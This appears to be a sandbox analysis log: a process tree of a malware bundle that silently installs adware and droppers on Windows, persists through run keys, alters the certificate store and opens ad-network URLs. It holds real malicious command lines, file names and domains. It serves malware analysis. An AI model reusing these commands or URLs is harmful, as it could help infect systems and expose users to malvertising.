C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7424 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1788 /prefetch:311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6516 /prefetch:311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8152 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7880 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7792 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8016 /prefetch:111⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BOI1A.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-BOI1A.tmp\{app}\vdi_compiler"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 25610⤵
- Executes dropped EXE
- Program crash
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629409794 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-57POT.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-57POT.tmp\WEATHER Manager.tmp" /SL5="$402FA,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-JACSO.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-JACSO.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-JACSO.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-JACSO.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629409794 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-QEEMA.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-QEEMA.tmp\VPN.tmp" /SL5="$30312,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-1KP0B.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-1KP0B.tmp\Setup.exe" /silent /subid=7207⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QR1PE.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-QR1PE.tmp\Setup.tmp" /SL5="$30454,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-1KP0B.tmp\Setup.exe" /silent /subid=7208⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "9⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090110⤵
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "9⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090110⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall9⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install9⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 17886⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IOICO.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-IOICO.tmp\MediaBurner2.tmp" /SL5="$60166,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\is-VPG86.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-VPG86.tmp\3377047_logo_media.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Reference Assemblies\QSNISKFYOW\ultramediaburner.exe"C:\Program Files\Reference Assemblies\QSNISKFYOW\ultramediaburner.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-F5DB6.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-F5DB6.tmp\ultramediaburner.tmp" /SL5="$20216,281924,62464,C:\Program Files\Reference Assemblies\QSNISKFYOW\ultramediaburner.exe" /VERYSILENT9⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
-
C:\Users\Admin\AppData\Local\Temp\c9-8fbb6-53d-f34b6-4c97474a1c681\Rylefesyne.exe"C:\Users\Admin\AppData\Local\Temp\c9-8fbb6-53d-f34b6-4c97474a1c681\Rylefesyne.exe"8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffde6f046f8,0x7ffde6f04708,0x7ffde6f0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,3070471823949968650,5075342618351788882,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1c0,0x1f0,0x7ffde6f046f8,0x7ffde6f04708,0x7ffde6f0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffde6f046f8,0x7ffde6f04708,0x7ffde6f0471810⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffde6f046f8,0x7ffde6f04708,0x7ffde6f0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffde6f046f8,0x7ffde6f04708,0x7ffde6f0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631199⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e8,0x1c0,0x1ec,0x1e4,0x1f0,0x7ffde6f046f8,0x7ffde6f04708,0x7ffde6f0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942319⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffde6f046f8,0x7ffde6f04708,0x7ffde6f0471810⤵
-
C:\Users\Admin\AppData\Local\Temp\8c-7b380-698-72b82-32861e8100970\Dygaepefifae.exe"C:\Users\Admin\AppData\Local\Temp\8c-7b380-698-72b82-32861e8100970\Dygaepefifae.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bjx2ip1x.yht\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\bjx2ip1x.yht\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\bjx2ip1x.yht\GcleanerEU.exe /eufive10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4572 -s 25211⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n5fbysct.kuc\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\n5fbysct.kuc\installer.exeC:\Users\Admin\AppData\Local\Temp\n5fbysct.kuc\installer.exe /qn CAMPAIGN="654"10⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\n5fbysct.kuc\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\n5fbysct.kuc\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629409794 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r5ikg2lc.cns\ufgaa.exe & exit9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fygjvqnr.tnt\anyname.exe & exit9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Local\Temp\fygjvqnr.tnt\anyname.exeC:\Users\Admin\AppData\Local\Temp\fygjvqnr.tnt\anyname.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\fygjvqnr.tnt\anyname.exe"C:\Users\Admin\AppData\Local\Temp\fygjvqnr.tnt\anyname.exe" -q11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xy2rygvc.jmh\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\xy2rygvc.jmh\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\xy2rygvc.jmh\gcleaner.exe /mixfive10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7308 -s 25611⤵
- Program crash
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ze12iyf3.mpu\autosubplayer.exe /S & exit9⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\3144051.exe"C:\Users\Admin\AppData\Roaming\3144051.exe"6⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5252 -s 23687⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\5848922.exe"C:\Users\Admin\AppData\Roaming\5848922.exe"6⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\7550179.exe"C:\Users\Admin\AppData\Roaming\7550179.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\6380996.exe"C:\Users\Admin\AppData\Roaming\6380996.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\8667157.exe"C:\Users\Admin\AppData\Roaming\8667157.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 24127⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tmpD1E7_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpD1E7_tmp.exe"6⤵
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks9⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i9⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i28⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i29⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i30⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i31⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i32⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i33⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i34⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i35⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i36⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i37⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i38⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i39⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i40⤵
-
